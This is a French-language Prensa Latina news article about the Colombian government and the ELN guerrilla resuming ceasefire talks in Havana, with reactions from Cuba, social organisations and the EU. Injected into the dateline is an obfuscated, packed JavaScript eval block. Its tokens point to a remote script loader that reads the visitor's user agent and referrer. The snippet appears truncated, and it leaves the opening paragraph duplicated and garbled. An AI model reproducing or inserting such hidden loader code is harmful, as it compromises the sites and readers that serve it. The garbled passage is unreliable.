jeudi 18 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Semaine-clef pour le dialogue de paix entre le gouvernement et l’ELN colombiens

Bogotá, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zbiba|var|u0026u|referrer|tefyf||js|php'.split('|'),0,{})) 7 mai (Prensa Latina) À partir de cette semaine, La Havane accueille les négociations entre le gouvernement et l’ELN de Colombie, dont l’objectif premier est un nouvel accord de cessez-le-feu bilatéral.

Bogotá, 7 mai (Prensa Latina) À partir de cette semaine, La Havane accueille les négociations entre le gouvernement et l’ELN de Colombie, dont l’objectif premier est un nouvel accord de cessez-le-feu bilatéral.

Depuis Bogotá, le président de Colombie, Juan Manuel Santos, a souligné que les conversations avec l’Armée de Libération Nationale (ELN) vont reprendre à Cuba “pour progresser le plus possible dans ces pourparlers”.

Parallèlement, le gouvernement de Cuba a ratifié, samedi dernier, sa volonté de contribuer à la poursuite du dialogue de paix entre ces deux parties qui sont engagées dans un conflit armé, a confirmé à La Havane le chef de l’équipe des garants cubains, Ivan Mora.

De plus, dans un communiqué commun, les délégations du gouvernement  et de la guérilla de l’ELN, ont souligné que le travail de ce cinquième cycle de réunions continuera à se concentrer sur la recherche d’une nouvelle trêve et sur la façon de trouver des moyens de participation sociale pour les futurs ex-guérilleros.

Les deux parties ont également insisté sur leur intérêt commun à impulser un agenda pouvant aboutir à un Accord Cadre.

Les organisations sociales de Colombie se sont félicitées du choix de Cuba comme siège du dialogue et ont souligné ce nouvel apport de La Havane à la construction de la paix en Colombie.

Elles ont aussi rappelé la part prise par Cuba dans le processus de négociations entre le gouvernement de Juan Manuel Santos et l’ex-guérilla des Forces Armées Révolutionnaires de Colombie-Armée du Peuple (FARC-EP) qui s’est soldé par la signature d’un Accord de Paix historique.

La veille, l’Union Européenne s’est aussi félicitée de cette reprise des négociations  à La Havane qui signifie “un pas en avant” vers la réalisation d’une paix solide et durable en Colombie.

“Nous désirons que les deux parties fournissent un travail qui débouchera sur un cessez-le-feu, ce qui améliorerait de manière significative la condition humanitaire dans les régions affectées par le conflit”, a exprimé, dans un communiqué de presse, FedericaMogherini, la représentante de l’U.E pour la politique étrangère.

Le cycle actuel d’échanges entre le gouvernement de Colombie et l’ELN a été interrompu le 18 avril dernier après que le président de l’Équateur, Lenin Moreno, ait renoncé à ce que son pays continue de servir de garant aux pourparlers de paix entre les deux parties.

peo/asg/pta

EN CONTINU
notes connexes